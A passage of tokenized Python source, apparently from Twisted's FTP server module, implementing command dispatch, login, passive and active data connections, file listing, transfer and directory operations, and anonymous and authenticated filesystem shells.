pauseProducing ( ) <EOL> def processFailed ( err ) : <EOL> if err . check ( FTPCmdError ) : <EOL> self . sendLine ( err . value . response ( ) ) <EOL> elif ( err . check ( TypeError ) and <EOL> err . value . args [ <NUM_LIT:0> ] . find ( '<STR_LIT>' ) != - <NUM_LIT:1> ) : <EOL> self . reply ( SYNTAX_ERR , "<STR_LIT>" % ( cmd , ) ) <EOL> else : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> self . reply ( REQ_ACTN_NOT_TAKEN , "<STR_LIT>" ) <EOL> def processSucceeded ( result ) : <EOL> if isinstance ( result , tuple ) : <EOL> self . reply ( * result ) <EOL> elif result is not None : <EOL> self . reply ( result ) <EOL> def allDone ( ignored ) : <EOL> if not self . disconnected : <EOL> self . resumeProducing ( ) <EOL> spaceIndex = line . find ( '<STR_LIT:U+0020>' ) <EOL> if spaceIndex != - <NUM_LIT:1> : <EOL> cmd = line [ : spaceIndex ] <EOL> args = ( line [ spaceIndex + <NUM_LIT:1> : ] , ) <EOL> else : <EOL> cmd = line <EOL> args = ( ) <EOL> d = defer . maybeDeferred ( self . processCommand , cmd , * args ) <EOL> d . addCallbacks ( processSucceeded , processFailed ) <EOL> d . addErrback ( log . err ) <EOL> from twisted . internet import reactor <EOL> reactor . callLater ( <NUM_LIT:0> , d . addBoth , allDone ) <EOL> def processCommand ( self , cmd , * params ) : <EOL> def call_ftp_command ( command ) : <EOL> method = getattr ( self , "<STR_LIT>" + command , None ) <EOL> if method is not None : <EOL> return method ( * params ) <EOL> return defer . fail ( CmdNotImplementedError ( command ) ) <EOL> cmd = cmd . upper ( ) <EOL> if cmd in self . PUBLIC_COMMANDS : <EOL> return call_ftp_command ( cmd ) <EOL> elif self . state == self . UNAUTH : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . ftp_USER ( * params ) <EOL> elif cmd == '<STR_LIT>' : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> else : <EOL> return NOT_LOGGED_IN <EOL> elif self . state == self . INAUTH : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . ftp_PASS ( * params ) <EOL> else : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> elif self . state == self . AUTHED : <EOL> return call_ftp_command ( cmd ) <EOL> elif self . state == self . RENAMING : <EOL> if cmd == '<STR_LIT>' : <EOL> return self . ftp_RNTO ( * params ) <EOL> else : <EOL> return BAD_CMD_SEQ , "<STR_LIT>" <EOL> def getDTPPort ( self , factory ) : <EOL> """<STR_LIT>""" <EOL> for portn in self . passivePortRange : <EOL> try : <EOL> dtpPort = self . listenFactory ( portn , factory ) <EOL> except error . CannotListenError : <EOL> continue <EOL> else : <EOL> return dtpPort <EOL> raise error . CannotListenError ( '<STR_LIT>' , portn , <EOL> "<STR_LIT>" % <EOL> ( self . passivePortRange , ) ) <EOL> def ftp_USER ( self , username ) : <EOL> """<STR_LIT>""" <EOL> if not username : <EOL> return defer . fail ( CmdSyntaxError ( '<STR_LIT>' ) ) <EOL> self . _user = username <EOL> self . state = self . INAUTH <EOL> if self . factory . allowAnonymous and self . _user == self . factory . userAnonymous : <EOL> return GUEST_NAME_OK_NEED_EMAIL <EOL> else : <EOL> return ( USR_NAME_OK_NEED_PASS , username ) <EOL> def ftp_PASS ( self , password ) : <EOL> """<STR_LIT>""" <EOL> if self . factory . allowAnonymous and self . _user == self . factory . userAnonymous : <EOL> creds = credentials . Anonymous ( ) <EOL> reply = GUEST_LOGGED_IN_PROCEED <EOL> else : <EOL> creds = credentials . UsernamePassword ( self . _user , password ) <EOL> reply = USR_LOGGED_IN_PROCEED <EOL> del self . _user <EOL> def _cbLogin ( ( interface , avatar , logout ) ) : <EOL> assert interface is IFTPShell , "<STR_LIT>" <EOL> self . shell = avatar <EOL> self . logout = logout <EOL> self . workingDirectory = [ ] <EOL> self . state = self . AUTHED <EOL> return reply <EOL> def _ebLogin ( failure ) : <EOL> failure . trap ( cred_error . UnauthorizedLogin , cred_error . UnhandledCredentials ) <EOL> self . state = self . UNAUTH <EOL> raise AuthorizationError <EOL> d = self . portal . login ( creds , None , IFTPShell ) <EOL> d . addCallbacks ( _cbLogin , _ebLogin ) <EOL> return d <EOL> def ftp_PASV ( self ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpFactory is not None : <EOL> self . cleanupDTP ( ) <EOL> self . dtpFactory = DTPFactory ( pi = self ) <EOL> self . dtpFactory . setTimeout ( self . dtpTimeout ) <EOL> self . dtpPort = self . getDTPPort ( self . dtpFactory ) <EOL> host = self . transport . getHost ( ) . host <EOL> port = self . dtpPort . getHost ( ) . port <EOL> self . reply ( ENTERING_PASV_MODE , encodeHostPort ( host , port ) ) <EOL> return self . dtpFactory . deferred . addCallback ( lambda ign : None ) <EOL> def ftp_PORT ( self , address ) : <EOL> addr = map ( int , address . split ( '<STR_LIT:U+002C>' ) ) <EOL> ip = '<STR_LIT>' % tuple ( addr [ : <NUM_LIT:4> ] ) <EOL> port = addr [ <NUM_LIT:4> ] << <NUM_LIT:8> | addr [ <NUM_LIT:5> ] <EOL> if self . dtpFactory is not None : <EOL> self . cleanupDTP ( ) <EOL> self . dtpFactory = DTPFactory ( pi = self , peerHost = self . transport . getPeer ( ) . host ) <EOL> self . dtpFactory . setTimeout ( self . dtpTimeout ) <EOL> self . dtpPort = reactor . connectTCP ( ip , port , self . dtpFactory ) <EOL> def connected ( ignored ) : <EOL> return ENTERING_PORT_MODE <EOL> def connFailed ( err ) : <EOL> err . trap ( PortConnectionError ) <EOL> return CANT_OPEN_DATA_CNX <EOL> return self . dtpFactory . deferred . addCallbacks ( connected , connFailed ) <EOL> def _encodeName ( self , name ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( name , unicode ) : <EOL> return name . encode ( '<STR_LIT:utf-8>' ) <EOL> return name <EOL> def ftp_LIST ( self , path = '<STR_LIT>' ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None or not self . dtpInstance . isConnected : <EOL> return defer . fail ( BadCmdSequenceError ( '<STR_LIT>' ) ) <EOL> if path . lower ( ) in [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] : <EOL> path = '<STR_LIT>' <EOL> def gotListing ( results ) : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> for ( name , attrs ) in results : <EOL> name = self . _encodeName ( name ) <EOL> self . dtpInstance . sendListResponse ( name , attrs ) <EOL> self . dtpInstance . transport . loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> d = self . shell . list ( <EOL> segments , <EOL> ( '<STR_LIT:size>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) ) <EOL> d . addCallback ( gotListing ) <EOL> return d <EOL> def ftp_NLST ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None or not self . dtpInstance . isConnected : <EOL> return defer . fail ( <EOL> BadCmdSequenceError ( '<STR_LIT>' ) ) <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbList ( results , glob ) : <EOL> """<STR_LIT>""" <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> for ( name , ignored ) in results : <EOL> if not glob or ( glob and fnmatch . fnmatch ( name , glob ) ) : <EOL> name = self . _encodeName ( name ) <EOL> self . dtpInstance . sendLine ( name ) <EOL> self . dtpInstance . transport . loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def listErr ( results ) : <EOL> """<STR_LIT>""" <EOL> self . dtpInstance . transport . loseConnection ( ) <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> if _isGlobbingExpression ( segments ) : <EOL> glob = segments . pop ( ) <EOL> else : <EOL> glob = None <EOL> d = self . shell . list ( segments ) <EOL> d . addCallback ( cbList , glob ) <EOL> d . addErrback ( listErr ) <EOL> return d <EOL> def ftp_CWD ( self , path ) : <EOL> try : <EOL> segments = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def accessGranted ( result ) : <EOL> self . workingDirectory = segments <EOL> return ( REQ_FILE_ACTN_COMPLETED_OK , ) <EOL> return self . shell . access ( segments ) . addCallback ( accessGranted ) <EOL> def ftp_CDUP ( self ) : <EOL> return self . ftp_CWD ( '<STR_LIT:..>' ) <EOL> def ftp_PWD ( self ) : <EOL> return ( PWD_REPLY , '<STR_LIT:/>' + '<STR_LIT:/>' . join ( self . workingDirectory ) ) <EOL> def ftp_RETR ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None : <EOL> raise BadCmdSequenceError ( '<STR_LIT>' ) <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> self . setTimeout ( None ) <EOL> def enableTimeout ( result ) : <EOL> self . setTimeout ( self . factory . timeOut ) <EOL> return result <EOL> if not self . binary : <EOL> cons = ASCIIConsumerWrapper ( self . dtpInstance ) <EOL> else : <EOL> cons = self . dtpInstance <EOL> def cbSent ( result ) : <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def ebSent ( err ) : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> if err . check ( FTPCmdError ) : <EOL> return err <EOL> return ( CNX_CLOSED_TXFR_ABORTED , ) <EOL> def cbOpened ( file ) : <EOL> if self . dtpInstance . isConnected : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> else : <EOL> self . reply ( FILE_STATUS_OK_OPEN_DATA_CNX ) <EOL> d = file . send ( cons ) <EOL> d . addCallbacks ( cbSent , ebSent ) <EOL> return d <EOL> def ebOpened ( err ) : <EOL> if not err . check ( PermissionDeniedError , FileNotFoundError , IsADirectoryError ) : <EOL> log . msg ( "<STR_LIT>" ) <EOL> log . err ( err ) <EOL> if err . check ( FTPCmdError ) : <EOL> return ( err . value . errorCode , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> return ( FILE_NOT_FOUND , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> d = self . shell . openForReading ( newsegs ) <EOL> d . addCallbacks ( cbOpened , ebOpened ) <EOL> d . addBoth ( enableTimeout ) <EOL> return d <EOL> def ftp_STOR ( self , path ) : <EOL> """<STR_LIT>""" <EOL> if self . dtpInstance is None : <EOL> raise BadCmdSequenceError ( '<STR_LIT>' ) <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> self . setTimeout ( None ) <EOL> def enableTimeout ( result ) : <EOL> self . setTimeout ( self . factory . timeOut ) <EOL> return result <EOL> def cbOpened ( file ) : <EOL> """<STR_LIT>""" <EOL> d = file . receive ( ) <EOL> d . addCallback ( cbConsumer ) <EOL> d . addCallback ( lambda ignored : file . close ( ) ) <EOL> d . addCallbacks ( cbSent , ebSent ) <EOL> return d <EOL> def ebOpened ( err ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( err . value , FTPCmdError ) : <EOL> return ( err . value . errorCode , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> log . err ( err , "<STR_LIT>" ) <EOL> return ( FILE_NOT_FOUND , '<STR_LIT:/>' . join ( newsegs ) ) <EOL> def cbConsumer ( cons ) : <EOL> """<STR_LIT>""" <EOL> if not self . binary : <EOL> cons = ASCIIConsumerWrapper ( cons ) <EOL> d = self . dtpInstance . registerConsumer ( cons ) <EOL> if self . dtpInstance . isConnected : <EOL> self . reply ( DATA_CNX_ALREADY_OPEN_START_XFR ) <EOL> else : <EOL> self . reply ( FILE_STATUS_OK_OPEN_DATA_CNX ) <EOL> return d <EOL> def cbSent ( result ) : <EOL> """<STR_LIT>""" <EOL> return ( TXFR_COMPLETE_OK , ) <EOL> def ebSent ( err ) : <EOL> """<STR_LIT>""" <EOL> log . err ( err , "<STR_LIT>" ) <EOL> if err . check ( FTPCmdError ) : <EOL> return err <EOL> return ( CNX_CLOSED_TXFR_ABORTED , ) <EOL> d = self . shell . openForWriting ( newsegs ) <EOL> d . addCallbacks ( cbOpened , ebOpened ) <EOL> d . addBoth ( enableTimeout ) <EOL> return d <EOL> def ftp_SIZE ( self , path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbStat ( ( size , ) ) : <EOL> return ( FILE_STATUS , str ( size ) ) <EOL> return self . shell . stat ( newsegs , ( '<STR_LIT:size>' , ) ) . addCallback ( cbStat ) <EOL> def ftp_MDTM ( self , path ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> def cbStat ( ( modified , ) ) : <EOL> return ( FILE_STATUS , time . strftime ( '<STR_LIT>' , time . gmtime ( modified ) ) ) <EOL> return self . shell . stat ( newsegs , ( '<STR_LIT>' , ) ) . addCallback ( cbStat ) <EOL> def ftp_TYPE ( self , type ) : <EOL> """<STR_LIT>""" <EOL> p = type . upper ( ) <EOL> if p : <EOL> f = getattr ( self , '<STR_LIT>' + p [ <NUM_LIT:0> ] , None ) <EOL> if f is not None : <EOL> return f ( p [ <NUM_LIT:1> : ] ) <EOL> return self . type_UNKNOWN ( p ) <EOL> return ( SYNTAX_ERR , ) <EOL> def type_A ( self , code ) : <EOL> if code == '<STR_LIT>' or code == '<STR_LIT:N>' : <EOL> self . binary = False <EOL> return ( TYPE_SET_OK , '<STR_LIT:A>' + code ) <EOL> else : <EOL> return defer . fail ( CmdArgSyntaxError ( code ) ) <EOL> def type_I ( self , code ) : <EOL> if code == '<STR_LIT>' : <EOL> self . binary = True <EOL> return ( TYPE_SET_OK , '<STR_LIT:I>' ) <EOL> else : <EOL> return defer . fail ( CmdArgSyntaxError ( code ) ) <EOL> def type_UNKNOWN ( self , code ) : <EOL> return defer . fail ( CmdNotImplementedForArgError ( code ) ) <EOL> def ftp_SYST ( self ) : <EOL> return NAME_SYS_TYPE <EOL> def ftp_STRU ( self , structure ) : <EOL> p = structure . upper ( ) <EOL> if p == '<STR_LIT:F>' : <EOL> return ( CMD_OK , ) <EOL> return defer . fail ( CmdNotImplementedForArgError ( structure ) ) <EOL> def ftp_MODE ( self , mode ) : <EOL> p = mode . upper ( ) <EOL> if p == '<STR_LIT:S>' : <EOL> return ( CMD_OK , ) <EOL> return defer . fail ( CmdNotImplementedForArgError ( mode ) ) <EOL> def ftp_MKD ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . makeDirectory ( newsegs ) . addCallback ( lambda ign : ( MKD_REPLY , path ) ) <EOL> def ftp_RMD ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . removeDirectory ( newsegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_DELE ( self , path ) : <EOL> try : <EOL> newsegs = toSegments ( self . workingDirectory , path ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> return self . shell . removeFile ( newsegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_NOOP ( self ) : <EOL> return ( CMD_OK , ) <EOL> def ftp_RNFR ( self , fromName ) : <EOL> self . _fromName = fromName <EOL> self . state = self . RENAMING <EOL> return ( REQ_FILE_ACTN_PENDING_FURTHER_INFO , ) <EOL> def ftp_RNTO ( self , toName ) : <EOL> fromName = self . _fromName <EOL> del self . _fromName <EOL> self . state = self . AUTHED <EOL> try : <EOL> fromsegs = toSegments ( self . workingDirectory , fromName ) <EOL> tosegs = toSegments ( self . workingDirectory , toName ) <EOL> except InvalidPath : <EOL> return defer . fail ( FileNotFoundError ( fromName ) ) <EOL> return self . shell . rename ( fromsegs , tosegs ) . addCallback ( lambda ign : ( REQ_FILE_ACTN_COMPLETED_OK , ) ) <EOL> def ftp_FEAT ( self ) : <EOL> """<STR_LIT>""" <EOL> self . sendLine ( RESPONSE [ FEAT_OK ] [ <NUM_LIT:0> ] ) <EOL> for feature in self . FEATURES : <EOL> self . sendLine ( '<STR_LIT:U+0020>' + feature ) <EOL> self . sendLine ( RESPONSE [ FEAT_OK ] [ <NUM_LIT:1> ] ) <EOL> def ftp_OPTS ( self , option ) : <EOL> """<STR_LIT>""" <EOL> return self . reply ( OPTS_NOT_IMPLEMENTED , option ) <EOL> def ftp_QUIT ( self ) : <EOL> self . reply ( GOODBYE_MSG ) <EOL> self . transport . loseConnection ( ) <EOL> self . disconnected = True <EOL> def cleanupDTP ( self ) : <EOL> """<STR_LIT>""" <EOL> log . msg ( '<STR_LIT>' , debug = True ) <EOL> log . msg ( self . dtpPort ) <EOL> dtpPort , self . dtpPort = self . dtpPort , None <EOL> if interfaces . IListeningPort . providedBy ( dtpPort ) : <EOL> dtpPort . stopListening ( ) <EOL> elif interfaces . IConnector . providedBy ( dtpPort ) : <EOL> dtpPort . disconnect ( ) <EOL> else : <EOL> assert False , "<STR_LIT>" % ( dtpPort , ) <EOL> self . dtpFactory . stopFactory ( ) <EOL> self . dtpFactory = None <EOL> if self . dtpInstance is not None : <EOL> self . dtpInstance = None <EOL> class FTPFactory ( policies . LimitTotalConnectionsFactory ) : <EOL> """<STR_LIT>""" <EOL> protocol = FTP <EOL> overflowProtocol = FTPOverflowProtocol <EOL> allowAnonymous = True <EOL> userAnonymous = '<STR_LIT>' <EOL> timeOut = <NUM_LIT> <EOL> welcomeMessage = "<STR_LIT>" % ( copyright . version , ) <EOL> passivePortRange = xrange ( <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> def __init__ ( self , portal = None , userAnonymous = '<STR_LIT>' ) : <EOL> self . portal = portal <EOL> self . userAnonymous = userAnonymous <EOL> self . instances = [ ] <EOL> def buildProtocol ( self , addr ) : <EOL> p = policies . LimitTotalConnectionsFactory . buildProtocol ( self , addr ) <EOL> if p is not None : <EOL> p . wrappedProtocol . portal = self . portal <EOL> p . wrappedProtocol . timeOut = self . timeOut <EOL> p . wrappedProtocol . passivePortRange = self . passivePortRange <EOL> return p <EOL> def stopFactory ( self ) : <EOL> [ p . setTimeout ( None ) for p in self . instances if p . timeOut is not None ] <EOL> policies . LimitTotalConnectionsFactory . stopFactory ( self ) <EOL> class IFTPShell ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def makeDirectory ( path ) : <EOL> """<STR_LIT>""" <EOL> def removeDirectory ( path ) : <EOL> """<STR_LIT>""" <EOL> def removeFile ( path ) : <EOL> """<STR_LIT>""" <EOL> def rename ( fromPath , toPath ) : <EOL> """<STR_LIT>""" <EOL> def access ( path ) : <EOL> """<STR_LIT>""" <EOL> def stat ( path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def list ( path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> def openForReading ( path ) : <EOL> """<STR_LIT>""" <EOL> def openForWriting ( path ) : <EOL> """<STR_LIT>""" <EOL> class IReadFile ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def send ( consumer ) : <EOL> """<STR_LIT>""" <EOL> class IWriteFile ( Interface ) : <EOL> """<STR_LIT>""" <EOL> def receive ( ) : <EOL> """<STR_LIT>""" <EOL> def close ( ) : <EOL> """<STR_LIT>""" <EOL> def _getgroups ( uid ) : <EOL> """<STR_LIT>""" <EOL> result = [ ] <EOL> pwent = pwd . getpwuid ( uid ) <EOL> result . append ( pwent . pw_gid ) <EOL> for grent in grp . getgrall ( ) : <EOL> if pwent . pw_name in grent . gr_mem : <EOL> result . append ( grent . gr_gid ) <EOL> return result <EOL> def _testPermissions ( uid , gid , spath , mode = '<STR_LIT:r>' ) : <EOL> """<STR_LIT>""" <EOL> if mode == '<STR_LIT:r>' : <EOL> usr = stat . S_IRUSR <EOL> grp = stat . S_IRGRP <EOL> oth = stat . S_IROTH <EOL> amode = os . R_OK <EOL> elif mode == '<STR_LIT:w>' : <EOL> usr = stat . S_IWUSR <EOL> grp = stat . S_IWGRP <EOL> oth = stat . S_IWOTH <EOL> amode = os . W_OK <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % ( mode , ) ) <EOL> access = False <EOL> if os . path . exists ( spath ) : <EOL> if uid == <NUM_LIT:0> : <EOL> access = True <EOL> else : <EOL> s = os . stat ( spath ) <EOL> if usr & s . st_mode and uid == s . st_uid : <EOL> access = True <EOL> elif grp & s . st_mode and gid in _getgroups ( uid ) : <EOL> access = True <EOL> elif oth & s . st_mode : <EOL> access = True <EOL> if access : <EOL> if not os . access ( spath , amode ) : <EOL> access = False <EOL> log . msg ( "<STR_LIT>" % ( <EOL> uid , os . getuid ( ) ) ) <EOL> return access <EOL> class FTPAnonymousShell ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IFTPShell ) <EOL> def __init__ ( self , filesystemRoot ) : <EOL> self . filesystemRoot = filesystemRoot <EOL> def _path ( self , path ) : <EOL> return self . filesystemRoot . descendant ( path ) <EOL> def makeDirectory ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def removeDirectory ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def removeFile ( self , path ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def rename ( self , fromPath , toPath ) : <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def receive ( self , path ) : <EOL> path = self . _path ( path ) <EOL> return defer . fail ( AnonUserDeniedError ( ) ) <EOL> def openForReading ( self , path ) : <EOL> """<STR_LIT>""" <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> f = p . open ( '<STR_LIT:r>' ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( _FileReader ( f ) ) <EOL> def openForWriting ( self , path ) : <EOL> """<STR_LIT>""" <EOL> return defer . fail ( PermissionDeniedError ( "<STR_LIT>" ) ) <EOL> def access ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if not p . exists ( ) : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> try : <EOL> p . listdir ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def stat ( self , path , keys = ( ) ) : <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> try : <EOL> statResult = self . _statNode ( p , keys ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( statResult ) <EOL> else : <EOL> return self . list ( path , keys ) . addCallback ( lambda res : res [ <NUM_LIT:0> ] [ <NUM_LIT:1> ] ) <EOL> def list ( self , path , keys = ( ) ) : <EOL> """<STR_LIT>""" <EOL> filePath = self . _path ( path ) <EOL> if filePath . isdir ( ) : <EOL> entries = filePath . listdir ( ) <EOL> fileEntries = [ filePath . child ( p ) for p in entries ] <EOL> elif filePath . isfile ( ) : <EOL> entries = [ os . path . join ( * filePath . segmentsFrom ( self . filesystemRoot ) ) ] <EOL> fileEntries = [ filePath ] <EOL> else : <EOL> return defer . fail ( FileNotFoundError ( path ) ) <EOL> results = [ ] <EOL> for fileName , filePath in zip ( entries , fileEntries ) : <EOL> ent = [ ] <EOL> results . append ( ( fileName , ent ) ) <EOL> if keys : <EOL> try : <EOL> ent . extend ( self . _statNode ( filePath , keys ) ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , fileName ) <EOL> except : <EOL> return defer . fail ( ) <EOL> return defer . succeed ( results ) <EOL> def _statNode ( self , filePath , keys ) : <EOL> """<STR_LIT>""" <EOL> filePath . restat ( ) <EOL> return [ getattr ( self , '<STR_LIT>' + k ) ( filePath ) for k in keys ] <EOL> def _stat_size ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . getsize ( ) <EOL> def _stat_permissions ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . getPermissions ( ) <EOL> def _stat_hardlinks ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> return fp . getNumberOfHardLinks ( ) <EOL> except NotImplementedError : <EOL> return <NUM_LIT:0> <EOL> def _stat_modified ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . getModificationTime ( ) <EOL> def _stat_owner ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> userID = fp . getUserID ( ) <EOL> except NotImplementedError : <EOL> return "<STR_LIT:0>" <EOL> else : <EOL> if pwd is not None : <EOL> try : <EOL> return pwd . getpwuid ( userID ) [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return str ( userID ) <EOL> def _stat_group ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> try : <EOL> groupID = fp . getGroupID ( ) <EOL> except NotImplementedError : <EOL> return "<STR_LIT:0>" <EOL> else : <EOL> if grp is not None : <EOL> try : <EOL> return grp . getgrgid ( groupID ) [ <NUM_LIT:0> ] <EOL> except KeyError : <EOL> pass <EOL> return str ( groupID ) <EOL> def _stat_directory ( self , fp ) : <EOL> """<STR_LIT>""" <EOL> return fp . isdir ( ) <EOL> class _FileReader ( object ) : <EOL> implements ( IReadFile ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> self . _send = False <EOL> def _close ( self , passthrough ) : <EOL> self . _send = True <EOL> self . fObj . close ( ) <EOL> return passthrough <EOL> def send ( self , consumer ) : <EOL> assert not self . _send , "<STR_LIT>" <EOL> self . _send = True <EOL> d = basic . FileSender ( ) . beginFileTransfer ( self . fObj , consumer ) <EOL> d . addBoth ( self . _close ) <EOL> return d <EOL> class FTPShell ( FTPAnonymousShell ) : <EOL> """<STR_LIT>""" <EOL> def makeDirectory ( self , path ) : <EOL> p = self . _path ( path ) <EOL> try : <EOL> p . makedirs ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def removeDirectory ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if p . isfile ( ) : <EOL> return defer . fail ( IsNotADirectoryError ( path ) ) <EOL> try : <EOL> os . rmdir ( p . path ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def removeFile ( self , path ) : <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> p . remove ( ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def rename ( self , fromPath , toPath ) : <EOL> fp = self . _path ( fromPath ) <EOL> tp = self . _path ( toPath ) <EOL> try : <EOL> os . rename ( fp . path , tp . path ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , fromPath ) <EOL> except : <EOL> return defer . fail ( ) <EOL> else : <EOL> return defer . succeed ( None ) <EOL> def openForWriting ( self , path ) : <EOL> """<STR_LIT>""" <EOL> p = self . _path ( path ) <EOL> if p . isdir ( ) : <EOL> return defer . fail ( IsADirectoryError ( path ) ) <EOL> try : <EOL> fObj = p . open ( '<STR_LIT:w>' ) <EOL> except ( IOError , OSError ) , e : <EOL> return errnoToFailure ( e . errno , path ) <EOL> except : <EOL> return defer . fail ( ) <EOL> return defer . succeed ( _FileWriter ( fObj ) ) <EOL> class _FileWriter ( object ) : <EOL> implements ( IWriteFile ) <EOL> def __init__ ( self , fObj ) : <EOL> self . fObj = fObj <EOL> self . _receive = False <EOL> def receive ( self ) : <EOL> assert not self . _receive , "<STR_LIT>" <EOL> self . _receive = True <EOL> return defer . succeed ( FileConsumer ( self . fObj ) ) <EOL> def close ( self ) : <EOL> return defer . succeed ( None ) <EOL> class BaseFTPRealm : <EOL> """<STR_LIT>""" <EOL> implements ( portal . IRealm ) <EOL> def __init__ ( self , anonymousRoot ) : <EOL> self . anonymousRoot = filepath . FilePath ( anonymousRoot ) <EOL> def getHomeDirectory ( self , avatarId ) : <EOL> """<STR_LIT>""" <EOL> raise NotImplementedError ( <EOL> "<STR_LIT>" % ( self . __class__ , ) ) <EOL> def requestAvatar ( self , avatarId , mind , * interfaces ) : <EOL> for iface in interfaces : <EOL> if iface is IFTPShell : <EOL> if avatarId is checkers . ANONYMOUS : <EOL> avatar = FTPAnonymousShell ( self . anonymousRoot ) <EOL> else : <EOL> avatar = FTPShell ( self . getHomeDirectory ( avatarId ) ) <EOL> return ( IFTPShell , avatar , <EOL> getattr ( avatar , '<STR_LIT>' , lambda : None 